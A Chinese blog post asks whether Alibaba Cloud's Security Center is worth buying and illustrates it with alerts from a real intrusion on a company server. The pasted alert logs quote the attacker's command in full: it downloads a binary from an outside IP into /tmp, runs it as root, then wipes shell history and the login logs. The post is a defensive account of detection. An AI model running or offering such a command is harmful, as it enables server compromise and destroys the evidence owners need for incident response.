您现在的位置是:首页 > 服务器搭建服务器搭建

阿里云的云安全中心有用处吗

瓶子2019-08-15【服务器搭建】人已围观

简介阿里云之前有一项服务叫 安骑士,其实就是类似我们windows上用的杀毒软件,包括漏洞扫描、异常检测、日志监控等。安全中心先报了一个异常登录警告,之后又扫描到异常的exec下载执行,这黑客操作非常流畅啊。

阿里云之前有一项服务叫 安骑士,现在该为 云安全中心,其实就是类似我们windows上用的杀毒软件,包括漏洞扫描、异常检测、日志监控等。
要说这项功能,对企业的用处是比较大的,对个人网站来说,还算不太实用,买一台ECS一年500,买一年安全服务要600,问题是小网站谁来攻击你啊。

这个安全中心的功能好不好用呢?恰好我之前用公司的企业账号进行了试用,结果这几天就赶上黑客攻击,真是不看广告看疗效。
怎么知道是被黑客攻击的呢?
安全中心先报了一个异常登录警告,之后又扫描到异常的exec下载执行,这黑客操作非常流畅啊。

贴一下日志你们感受一下:
 

下载进程命令行:wget http://35.184.115.160/ilovee26
可疑URL:http://35.184.115.160/ilovee26
启动进程路径:/tmp/ilovee26
启动进程PID:13463
启动进程账户:root
启动进程命令行:./ilovee26
启动进程父进程路径:/bin/bash
事件说明:云盾检测到ECS从一个远程HTTP服务器下载了一个可执行文件到磁盘上,并立刻启动执行,该行为可疑程度较高,请及时关注,如果是您正常运维操作,请点标记为误报忽略该告警。
解决方案:收到该异常告警很可能是因为被黑客植入或主动运行了恶意病毒程序,请及时清理可疑程序文件及运行中进程。
 

父进程名称:/usr/sbin/sshd
进程名称:bash
进程路径:/bin/bash
进程id:13,460
命令行参数:bash -c cd /tmp;wget http://35.184.115.160/ilovee26;chmod +x ilovee26;./ilovee26;history -c ;history -w;rm -rf /root/.bash_history;echo > /var/log/secure;echo > /var/log/wtmp;echo > /var/log/btmp
事件说明:云盾检测到该异常指令执行,请及时排查,如果是您业务需要主动执行,可以忽略该告警。
解决方案:建议立即及时排查入侵原因。




所以说,企业赚钱的业务,不要心疼这点儿钱,花在安全上,总比被黑客拖库、木马、改程序、勒索要好上一百倍啊。

传送门:让你不被黑客黑了还不知道的安全中心






Tags:

很赞哦! ()

文章评论

    共有条评论来说两句吧...

    用户名:

    验证码:

站点信息

  • 建站时间:2019-05-01
  • 网站程序:帝国CMS7.5
  • 文章统计45篇文章
  • 微信公众号:关注最新拼团信息